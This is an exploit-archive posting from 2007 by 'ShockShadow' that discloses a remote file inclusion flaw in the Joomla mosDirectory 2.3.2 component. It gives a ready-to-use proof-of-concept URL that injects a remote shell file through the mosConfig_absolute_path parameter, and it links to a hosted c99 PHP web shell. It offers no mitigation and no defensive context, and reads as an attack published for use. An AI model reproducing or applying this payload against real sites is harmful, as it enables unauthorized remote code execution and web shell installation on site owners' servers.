[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component mosDirectory 2.3.2 Remote File Inclusion Vuln
# Published : 2007-12-24
# Author : ShockShadow
# Previous Title : Agares PhpAutoVideo 2.21 Remote/Local File Inclusion Vulnerabilities
# Next Title : PHP ZLink 0.3 (go.php) Remote SQL Injection Exploit


--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+          Joomla Component mosDirectory 2.3.2 Remote File Inclusion          +==--
--==+=============================================================================+==--

Software:     Joomla Component mosDirectory 2.3.2
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.box.net/shared/kdp2h6dbe1
txtShell:     http://yee7.com/shells/c99.txt

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################

by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members

# www.Syue.com [2007-12-24]